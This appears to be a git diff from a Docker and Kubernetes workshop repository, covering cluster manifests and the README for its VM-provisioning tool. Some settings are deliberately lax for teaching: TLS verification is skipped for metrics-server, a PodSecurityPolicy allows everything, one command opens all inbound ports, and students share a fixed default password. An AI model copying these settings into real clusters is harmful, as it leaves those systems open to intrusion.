  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.3
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s

---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
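Once the metrics-server deployment is up and the APIService is available, resource metrics can be queried with kubectl:

```bash
kubectl top nodes
kubectl top pods --all-namespaces
```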
@@ -5,7 +5,7 @@ metadata:
spec:
  podSelector:
    matchLabels:
-      run: testweb
+      app: testweb
  ingress:
  - from:
    - podSelector:
@@ -5,6 +5,6 @@ metadata:
spec:
  podSelector:
    matchLabels:
-      run: testweb
+      app: testweb
  ingress: []
@@ -16,7 +16,7 @@ metadata:
spec:
  podSelector:
    matchLabels:
-      run: webui
+      app: webui
  ingress:
  - from: []
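The three hunks above only rename the pod selector label from `run` to `app`. One way to probe such a policy (a sketch; it assumes a `testweb` Service exists in the same namespace):

```bash
# BusyBox wget: -T sets the timeout in seconds.
kubectl run testclient --rm -it --image=alpine --labels=app=testclient \
  -- wget -qO- -T 2 http://testweb
```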
8  k8s/nginx-1-without-volume.yaml  Normal file
@@ -0,0 +1,8 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-without-volume
spec:
  containers:
  - name: nginx
    image: nginx
13  k8s/nginx-2-with-volume.yaml  Normal file
@@ -0,0 +1,13 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
21  k8s/nginx-3-with-git.yaml  Normal file
@@ -0,0 +1,21 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-git
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
@@ -1,7 +1,7 @@
apiVersion: v1
kind: Pod
metadata:
-  name: nginx-with-volume
+  name: nginx-with-init
spec:
  volumes:
  - name: www
@@ -11,11 +11,10 @@ spec:
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
+  initContainers:
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
-  restartPolicy: OnFailure
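Init containers run to completion before the app containers start, so while the clone is running the pod reports an `Init:` status:

```bash
kubectl get pod nginx-with-init   # shows Init:0/1 while git runs, then Running
```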
98  k8s/persistent-consul.yaml  Normal file
@@ -0,0 +1,98 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: persistentconsul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: persistentconsul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: persistentconsul
subjects:
- kind: ServiceAccount
  name: persistentconsul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
  name: persistentconsul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: persistentconsul
spec:
  serviceName: persistentconsul
  replicas: 3
  selector:
    matchLabels:
      app: persistentconsul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: persistentconsul
    spec:
      serviceAccountName: persistentconsul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - persistentconsul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.6"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
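Once the three replicas have joined, membership and per-replica storage can be checked (a sketch; `consul members` is the standard Consul CLI command):

```bash
kubectl exec persistentconsul-0 -- consul members
kubectl get pvc   # one data-persistentconsul-N claim per replica
```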
1192  k8s/portworx.yaml
(File diff suppressed because it is too large)
@@ -12,12 +12,19 @@ spec:
      labels:
        app: postgres
    spec:
-      schedulerName: stork
+      #schedulerName: stork
+      initContainers:
+      - name: rmdir
+        image: alpine
+        volumeMounts:
+        - mountPath: /vol
+          name: postgres
+        command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
      containers:
      - name: postgres
-        image: postgres:10.5
+        image: postgres:11
        volumeMounts:
-        - mountPath: /var/lib/postgresql
+        - mountPath: /var/lib/postgresql/data
          name: postgres
  volumeClaimTemplates:
  - metadata:
39  k8s/psp-privileged.yaml  Normal file
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
38  k8s/psp-restricted.yaml  Normal file
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
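Both PodSecurityPolicy files define a ClusterRole allowing `use` of the policy, but no binding, so nothing can use the policies yet. A minimal sketch of a binding (the binding name and subject are hypothetical):

```bash
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: psp-restricted-default   # hypothetical name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp:restricted
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:serviceaccounts   # hypothetical subject: all service accounts
EOF
```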
@@ -6,7 +6,7 @@ metadata:
  creationTimestamp: null
  generation: 1
  labels:
-    run: socat
+    app: socat
  name: socat
  namespace: kube-system
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
@@ -14,7 +14,7 @@ spec:
  replicas: 1
  selector:
    matchLabels:
-      run: socat
+      app: socat
  strategy:
    rollingUpdate:
      maxSurge: 1
@@ -24,7 +24,7 @@ spec:
    metadata:
      creationTimestamp: null
      labels:
-        run: socat
+        app: socat
    spec:
      containers:
      - args:
@@ -49,7 +49,7 @@ kind: Service
metadata:
  creationTimestamp: null
  labels:
-    run: socat
+    app: socat
  name: socat
  namespace: kube-system
  selfLink: /api/v1/namespaces/kube-system/services/socat
@@ -60,7 +60,7 @@ spec:
    protocol: TCP
    targetPort: 80
  selector:
-    run: socat
+    app: socat
  sessionAffinity: None
  type: NodePort
status:
@@ -6,13 +6,16 @@ metadata:
  namespace: kube-system
---
kind: DaemonSet
-apiVersion: extensions/v1beta1
+apiVersion: apps/v1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
+  selector:
+    matchLabels:
+      k8s-app: traefik-ingress-lb
  template:
    metadata:
      labels:
@@ -26,7 +29,7 @@ spec:
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
-      - image: traefik
+      - image: traefik:1.7
        name: traefik-ingress-lb
        ports:
        - name: http
33  k8s/users:jean.doe.yaml  Normal file
@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
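With these rights, the `jean.doe` ServiceAccount can submit a CSR, which must be named `users:jean.doe`. A sketch of such a request (assuming a PEM CSR in a file `jean.doe.csr`; `base64 -w0` is the GNU coreutils flag):

```bash
kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: users:jean.doe
spec:
  request: $(base64 -w0 jean.doe.csr)   # base64-encoded PEM CSR
  usages: [ digital signature, key encipherment, client auth ]
EOF
```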
70  k8s/volumes-for-consul.yaml  Normal file
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
@@ -7,9 +7,9 @@ workshop.

## 1. Prerequisites

Virtualbox, Vagrant and Ansible

- Virtualbox: https://www.virtualbox.org/wiki/Downloads

- Vagrant: https://www.vagrantup.com/downloads.html

@@ -25,19 +25,20 @@ Virtualbox, Vagrant and Ansible

    $ git clone --recursive https://github.com/ansible/ansible.git
    $ cd ansible
-    $ git checkout stable-2.0.0.1
+    $ git checkout stable-{{ getStableVersionFromAnsibleProject }}
    $ git submodule update

- source the setup script to make Ansible available on this terminal session:

    $ source path/to/your-ansible-clone/hacking/env-setup

-- you need to repeat the last step everytime you open a new terminal session
+- you need to repeat the last step every time you open a new terminal session
  and want to use any Ansible command (but you'll probably only need to run
  it once).

## 2. Preparing the environment
+Change into the directory that contains your Vagrantfile.

Run the following commands:
@@ -66,6 +67,14 @@ will reflect inside the instance.

- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed

+- If you get an error like "no Vagrant file found", or you have a Vagrantfile but get "cannot open base box" when running `vagrant up`,
+  chances are good you are not in the correct directory.
+  Make sure you are in the subdirectory named "prepare-local"; it has all the config files required by Ansible, Vagrant, and VirtualBox.
+
+- If you are using Python 3.7, run the ansible-playbook provisioning, and see an error like "SyntaxError: invalid syntax" mentioning
+  the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict:
+  https://github.com/ansible/ansible/issues/42105
+
- If you get strange Ansible errors about dependencies, try to check your pip
  version with `pip --version`. The current version is 8.1.1. If your pip is
  older than this, upgrade it with `sudo pip install --upgrade pip`, restart
@@ -1,33 +1,53 @@
-# Trainer tools to create and prepare VMs for Docker workshops on AWS or Azure
+# Trainer tools to create and prepare VMs for Docker workshops
+
+These tools can help you to create VMs on:
+
+- Azure
+- EC2
+- OpenStack

## Prerequisites

- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
-- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
+- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
+
+Depending on the infrastructure that you want to use, you also need to install
+the Azure CLI, the AWS CLI, or Terraform (for OpenStack deployment).

And if you want to generate printable cards:

-- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
-- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
+- [pyyaml](https://pypi.python.org/pypi/PyYAML)
+- [jinja2](https://pypi.python.org/pypi/Jinja2)
+
+You can install them with pip (perhaps with `pip install --user`, or even with `virtualenv` if that's your thing).

These require Python 3. If you are on a Mac, see below for specific instructions on setting up
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.

## General Workflow

- fork/clone repo
-- set required environment variables
+- create an infrastructure configuration in the `prepare-vms/infra` directory
+  (using one of the example files in that directory)
+- create your own settings file from `settings/example.yaml`
+- if necessary, increase allowed open files: `ulimit -Sn 10000`
-- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
-- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
+- run `./workshopctl start` to create instances
+- run `./workshopctl deploy` to install Docker and set up the environment
+- run `./workshopctl kube` (if you want to install and set up Kubernetes)
+- run `./workshopctl cards` (if you want to generate a PDF for printing handouts of each user's host IPs and login info)
+- run `./workshopctl stop` at the end of the workshop to terminate instances (a full example session is sketched below)
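Putting the workflow together, a typical session might look like this (the infra and settings file names, the instance count, and TAG are placeholders):

```bash
./workshopctl start --infra infra/aws-us-west-2 --settings settings/myworkshop.yaml --count 25
./workshopctl deploy TAG    # TAG is printed by "start"
./workshopctl kube TAG
./workshopctl cards TAG
./workshopctl stop TAG      # at the end of the workshop
```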
## Clone/Fork the Repo, and Build the Tools Image

The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).

-    $ git clone https://github.com/jpetazzo/orchestration-workshop.git
-    $ cd orchestration-workshop/prepare-vms
+    $ git clone https://github.com/jpetazzo/container.training
+    $ cd container.training/prepare-vms
    $ docker-compose build

## Preparing to Run `./workshopctl`

### Required AWS Permissions/Info
@@ -36,53 +56,74 @@ The Docker Compose file here is used to build an image with all the dependencies

- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.

-### Required Environment Variables
+### Create your `infra` file

-- `AWS_ACCESS_KEY_ID`
-- `AWS_SECRET_ACCESS_KEY`
-- `AWS_DEFAULT_REGION`
+You need to do this only once. (On AWS, you can create one `infra`
+file per region.)

-If you're not using AWS, set these to placeholder values:
-
-```
-export AWS_ACCESS_KEY_ID="foo"
-export AWS_SECRET_ACCESS_KEY="foo"
-export AWS_DEFAULT_REGION="foo"
-```
+Make a copy of one of the example files in the `infra` directory.
+
+For instance:
+
+```bash
+cp infra/example.aws infra/aws-us-west-2
+```
+
+Edit your infrastructure file to customize it.
+You will probably need to put your cloud provider credentials,
+select a region...

If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.

-### Update/copy `settings/example.yaml`
+### Create your `settings` file

-Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
-
-    ./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
+Similarly, pick one of the files in `settings` and copy it
+to customize it.
+
+For instance:
+
+```bash
+cp settings/example.yaml settings/myworkshop.yaml
+```
+
+You're all set!

## `./workshopctl` Usage
```
workshopctl - the orchestration workshop swiss army knife
Commands:
-ami          Show the AMI that will be used for deployment
-amis         List Ubuntu AMIs in the current region
-build        Build the Docker image to run this program in a container
-cards        Generate ready-to-print cards for a batch of VMs
-deploy       Install Docker on a bunch of running VMs
-ec2quotas    Check our EC2 quotas (max instances)
-help         Show available commands
-ids          List the instance IDs belonging to a given tag or token
-ips          List the IP addresses of the VMs for a given tag or token
-kube         Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
-kubetest     Check that all notes are reporting as Ready
-list         List available batches in the current region
-opensg       Open the default security group to ALL ingress traffic
-pull_images  Pre-pull a bunch of Docker images
-retag        Apply a new tag to a batch of VMs
-start        Start a batch of VMs
-status       List instance status for a given batch
-stop         Stop (terminate, shutdown, kill, remove, destroy...) instances
-test         Run tests (pre-flight checks) on a batch of VMs
-wrap         Run this program in a container
+build                Build the Docker image to run this program in a container
+cards                Generate ready-to-print cards for a group of VMs
+deploy               Install Docker on a bunch of running VMs
+disableaddrchecks    Disable source/destination IP address checks
+disabledocker        Stop Docker Engine and don't restart it automatically
+helmprom             Install Helm and Prometheus
+help                 Show available commands
+ids                  (FIXME) List the instance IDs belonging to a given tag or token
+kubebins             Install Kubernetes and CNI binaries but don't start anything
+kubereset            Wipe out Kubernetes configuration on all nodes
+kube                 Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
+kubetest             Check that all nodes are reporting as Ready
+listall              List VMs running on all configured infrastructures
+list                 List available groups for a given infrastructure
+netfix               Disable GRO and run a pinger job on the VMs
+opensg               Open the default security group to ALL ingress traffic
+ping                 Ping VMs in a given tag, to check that they have network access
+pssh                 Run an arbitrary command on all nodes
+pull_images          Pre-pull a bunch of Docker images
+quotas               Check our infrastructure quotas (max instances)
+remap_nodeports      Remap NodePort range to 10000-10999
+retag                (FIXME) Apply a new tag to a group of VMs
+ssh                  Open an SSH session to the first node of a tag
+start                Start a group of VMs
+stop                 Stop (terminate, shutdown, kill, remove, destroy...) instances
+tags                 List groups of VMs known locally
+test                 Run tests (pre-flight checks) on a group of VMs
+weavetest            Check that weave seems properly setup
+webssh               Install a WEB SSH server on the machines (port 1080)
+wrap                 Run this program in a container
+www                  Run a web server to access card HTML and PDF
```
### Summary of What `./workshopctl` Does For You

@@ -95,22 +136,22 @@ wrap                 Run this program in a container

- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. This can be configured with the `docker_user_password` property in the settings file.

-### Example Steps to Launch a Batch of AWS Instances for a Workshop
+### Example Steps to Launch a Group of AWS Instances for a Workshop

-- Run `./workshopctl start N` Creates `N` EC2 instances
+- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
  - Your local SSH key will be synced to instances under the `ubuntu` user
  - AWS instances will be created and tagged based on date, and IPs stored in `prepare-vms/tags/`
-- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `lib/postprep.py` via parallel-ssh
+- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
  - If it errors or times out, you should be able to rerun
  - Requires a good connection to run all the parallel SSH connections, up to 100 in parallel (ProTip: create a dedicated management instance in the same AWS region where you run all these utils from)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
-- Run `./workshopctl cards TAG settings/somefile.yaml` to generate PDF/HTML files to print, cut, and hand out to students
+- Run `./workshopctl cards TAG` to generate PDF/HTML files to print, cut, and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
### Example Steps to Launch Azure Instances

-- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account
+- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
  - Required:
    - Provide the SSH public key you plan to use for instance configuration
@@ -155,27 +196,16 @@ az group delete --resource-group workshop

### Example Steps to Configure Instances from a non-AWS Source

-- Launch instances via your preferred method. You'll need to get the instance IPs and be able to ssh into them.
-- Set placeholder values for [AWS environment variable settings](#required-environment-variables).
-- Choose a tag. It could be an event name, datestamp, etc. Ensure you have created a directory for your tag: `prepare-vms/tags/<tag>/`
-- If you have not already generated a file with the IPs to be configured:
-  - The file should be named `prepare-vms/tags/<tag>/ips.txt`
-  - Format is one IP per line, no other info needed.
-- Ensure the settings file is as desired (especially the number of nodes): `prepare-vms/settings/kube101.yaml`
-- For a tag called `myworkshop`, configure instances: `workshopctl deploy myworkshop settings/kube101.yaml`
-- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube myworkshop`
-- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest myworkshop`
-- Generate cards to print and hand out: `workshopctl cards myworkshop settings/kube101.yaml`
-- Print the cards file: `prepare-vms/tags/myworkshop/ips.html`
-
-## Other Tools
-
-### Deploying your SSH key to all the machines
-
-- Make sure that you have SSH keys loaded (`ssh-add -l`).
-- Source `rc`.
-- Run `pcopykey`.
+- Copy `infra/example.generic` to `infra/generic`
+- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
+- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
+- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
+- Edit the file `prepare-vms/tags/TAG/ips.txt`; it should list the IP addresses of the VMs (one per line, without any comments or other info)
+- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
+- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube TAG`
+- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest TAG`
+- Generate cards to print and hand out: `workshopctl cards TAG`
+- Print the cards file: `prepare-vms/tags/TAG/ips.html`
## Even More Details

@@ -188,7 +218,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.

#### Instance + tag creation

-10 VMs will be started, with an automatically generated tag (timestamp + your username).
+The VMs will be started, with an automatically generated tag (timestamp + your username).

Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -196,15 +226,11 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.

Following the creation of the VMs, a text file will be created containing a list of their IPs.

-This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
-
-If you create new VMs, the symlinked file will be overwritten.
-
#### Deployment

Instances can be deployed manually using the `deploy` command:

-    $ ./workshopctl deploy TAG settings/somefile.yaml
+    $ ./workshopctl deploy TAG

The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
@@ -214,7 +240,7 @@ The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.

#### Generate cards

-    $ ./workshopctl cards TAG settings/somefile.yaml
+    $ ./workshopctl cards TAG

If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
@@ -222,13 +248,11 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency.

#### List tags

-    $ ./workshopctl list
+    $ ./workshopctl list infra/some-infra-file

#### List VMs

+    $ ./workshopctl listall
-    $ ./workshopctl list TAG
-
-This will print a human-friendly list containing some information about each instance.
+    $ ./workshopctl tags
#### Stop and destroy VMs

@@ -238,3 +262,32 @@ This will print a human-friendly list containing some information about each instance.

- Don't write to bash history in system() in postprep
- compose, etc. version inconsistent (int vs str)

## Making sure Python 3 is the default (Mac only)

Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.

1) Verify that Python 3 is installed.

```
ls -la /usr/local/Cellar/Python
```

You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.

2) Verify that `python` points to Python 3.

```
ls -la /usr/local/bin/python
```

If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.

```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```
@@ -1,106 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 14px;
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 21.5%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

p {
  margin: 0.4em 0 0.4em 0;
}

img {
  height: 4em;
  float: right;
  margin-right: -0.4em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -7,15 +7,6 @@ fi
if id docker; then
  sudo userdel -r docker
fi
-pip install --user awscli jinja2 pdfkit
